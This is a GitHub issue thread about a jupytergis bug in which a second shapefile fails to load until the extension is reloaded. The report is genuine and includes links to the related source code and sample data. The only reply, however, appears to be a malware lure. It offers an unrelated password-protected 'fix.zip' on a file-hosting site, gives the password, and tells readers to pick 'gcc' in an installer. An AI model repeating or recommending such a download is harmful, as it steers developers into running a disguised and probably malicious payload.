### ISSUE TITLE
Bug: Second Shapefile Load Fails Initially, Corrects After JupyterGIS Reload

### ISSUE THREAD

**Issue by arjxn-py** [geojupyter/jupytergis#117]
While loading shapefiles, the first shapefile loads correctly. However, when loading a second shapefile immediately after, the process becomes buggy. This issue is temporarily resolved when the JupyterGIS extension is reloaded, after which the second shapefile loads without any problems. Related to #104 

https://github.com/user-attachments/assets/58f056d1-b9a0-4257-9a67-c6785f738f1c

Related Method: 
https://github.com/geojupyter/jupytergis/blob/c794f2a03a26ea31c82fb932edc4b2da688415d4/packages/base/src/mainview/mainview.tsx#L306-L319

Sample data that's been loaded: 
- [https://www2.census.gov/geo/tiger/GENZ2015/shp/cb_2015_us_county_500k.zip](https://www2.census.gov/geo/tiger/GENZ2015/shp/cb_2015_us_county_500k.zip)
- [https://docs.geoserver.org/stable/en/user/_downloads/30e405b790e068c43354367cb08e71bc/nyc_roads.zip](https://docs.geoserver.org/stable/en/user/_downloads/30e405b790e068c43354367cb08e71bc/nyc_roads.zip)

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
